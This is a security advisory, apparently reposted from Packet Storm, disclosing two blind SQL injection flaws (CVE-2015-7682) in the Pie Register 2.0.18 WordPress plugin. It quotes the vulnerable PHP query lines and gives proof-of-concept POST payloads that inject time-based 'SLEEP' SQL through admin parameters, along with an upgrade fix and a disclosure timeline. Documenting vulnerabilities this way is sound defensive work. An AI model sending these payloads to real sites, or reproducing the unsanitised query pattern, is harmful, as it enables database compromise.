WordPress Pie Register 2.0.18 SQL Injection

🗓️ 12 Oct 2015 00:00:00Reported by David MooreType

packetstorm🔗 packetstormsecurity.com👁 31 Views

Two SQL injection vulnerabilities in WordPress Pie Register 2.0.18 plugin can lead to database confidentiality loss by admins. Upgrade to version 2.0.19 or higher for fix

Reporter	Title	Published	Views	Family All 11
0day.today	WordPress Pie Register 2.0.18 Cross Site Scripting / SQL Injection Vulnerabilities	13 Oct 201500:00	–	zdt
CNVD	WordPress Pie Register Plugin SQL Injection Vulnerability	13 Oct 201500:00	–	cnvd
CVE	CVE-2015-7682	16 Oct 201520:00	–	cve
Cvelist	CVE-2015-7682	16 Oct 201520:00	–	cvelist
EUVD	EUVD-2015-7584	7 Oct 202500:30	–	euvd
NVD	CVE-2015-7682	16 Oct 201520:59	–	nvd
Patchstack	WordPress Pie Register Plugin <= 2.0.18 - Multiple SQL Injection	2 Oct 201500:00	–	patchstack
Prion	Sql injection	16 Oct 201520:59	–	prion
securityvulns	CVE-2015-7682: Multiple Blind SQL Injections in Pie Register WordPress Plugin	26 Oct 201500:00	–	securityvulns
securityvulns	Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)	26 Oct 201500:00	–	securityvulns

`  
Details  
================  
Software: Pie Register  
Version: 2.0.18  
Homepage: https://github.com/GTSolutions/Pie-Register  
CVE: CVE-2015-7682 (Pending)  
CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N)  
CWE: CWE-89  
  
Description  
================  
Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.  
  
Vulnerabilities  
================  
The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:  
  
Injection 1:  
>From pie-register/pie-register.php:  
576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']);  
. . .  
3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";  
  
Injection 2:  
>From pie-register/pie-register.php:  
1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))  
  
Proof of concept  
================  
URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes  
  
Injection 1:  
POST data:  
select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply  
  
Injection 2:  
POST data:  
piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201--  
  
Remediation  
================  
Upgrade the plugin to version 2.0.19 or higher.  
  
Timeline  
================  
2015-09-23: Discovered  
2015-09-24: Contacted vendor via website support form  
2015-09-28: Vendor supplied security contact email  
2015-09-28: Requested CVE  
2015-09-30: Report sent to vendor and wordpress.org  
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks  
  
Discovered by  
================  
David Moore @grajagandev  
  
`

12 Oct 2015 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.00362